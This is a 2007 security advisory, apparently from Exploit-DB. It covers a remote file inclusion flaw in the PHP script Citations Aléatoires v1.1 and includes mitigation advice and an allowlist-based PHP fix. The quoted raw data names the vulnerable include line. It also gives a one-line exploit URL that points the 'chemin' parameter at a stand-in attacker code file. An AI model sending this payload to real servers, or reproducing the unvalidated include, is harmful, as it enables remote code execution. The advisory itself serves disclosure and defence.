Vendor: Citations Aléatoires
By: GolD_M = Mahmood_ali
CVSS: 7.5 (HIGH)
CWE: Remote File Inclusion
Product Name: Citations Aléatoires
Affected Version From: Citations Aléatoires v1.1
Affected Version To: Citations Aléatoires v1.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Citations Aléatoires v1.1

The vulnerability exists in the /i-accueil.php file of the Citations Aléatoires v1.1 script. The script includes a file without properly validating user-supplied input, allowing an attacker to include arbitrary remote files. This can lead to remote code execution and compromise of the affected system.

Mitigation:

To mitigate this vulnerability, it is recommended to validate user input before including files and to use a whitelist approach instead of a blacklist approach.
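
The allowlist approach recommended above, sketched in PHP as an added example (not code from Citations Aléatoires or from the advisory). It assumes `$chemin` is never initialised by the script before line 13; `resolve_module()` and the `$allowed` map are hypothetical names.

```php
<?php
// Added example; resolve_module() and $allowed are hypothetical names.
//
// Before (i-accueil.php line 13, as quoted in the advisory):
//   include("$chemin/mod_news/index.php");
// Assumption: $chemin is not set by the script itself, so request input
// (e.g. via register_globals) decides what gets included.

function resolve_module(string $baseDir, string $module): string
{
    // Allowlist: the only files this page may include, relative to the
    // application root. Request data can pick a key, never a path.
    $allowed = [
        'news' => 'mod_news/index.php',
    ];
    if (!isset($allowed[$module])) {
        throw new InvalidArgumentException('unknown module');
    }

    // realpath() resolves local filesystem paths only, so a URL or a
    // missing file yields false instead of something includable.
    $base = realpath($baseDir);
    if ($base === false) {
        throw new RuntimeException('application root not found');
    }
    $path = realpath($base . DIRECTORY_SEPARATOR . $allowed[$module]);

    // Containment check: the resolved file must sit under the root even
    // after symlinks and ".." segments are collapsed.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($path === false || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException('module file outside application root');
    }
    return $path;
}

// After: the base path is fixed server-side and never read from the request.
$chemin = __DIR__;
try {
    include resolve_module($chemin, 'news');
} catch (Exception $e) {
    http_response_code(500);
    error_log('include refused: ' . $e->getMessage());
}

// Defence in depth (php.ini): allow_url_include = Off, register_globals = Off
```
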
Source

Exploit-DB raw data:

/###################################################################\
# Citations Aléatoires v1.1                                         #
# =========================================================         #
# Published : 2007-01-12                                            #
# Remote: Yes                                                       #
# Site:  ftp://ftp1.comscripts.com/PHP/1809_citation-11.zip         #
#####################################################################
# Author: GolD_M = Mahmood_ali                                      #
# Contact: HackEr_@W.Cn                                             #
# =====================================================             #
# ThanX =All My Friends& ABDULLAH00& AsbMay& ToOoFa& KaBaRa& str0ke #
# SpeciaL GreeTz : Tryag-Team & 4lKaSrGoLd3n-Team                   #
\###################################################################/
# /i-accueil.php                                                    #
# Line:                                                             #
# /13                                                               #
# Vulnerable Code:                                                  #
# include("$chemin/mod_news/index.php");                            #
# 3XP|0!T :                                                         #
# /i-accueil.php?chemin=EV!L.C0D3.TxT                               #
#        /#######################################\                  #
#        #         Tryag.Com & Dwrat.Com         #                  #
#        \#######################################/                  #
\###################################################################/

# milw0rm.com [2007-01-12]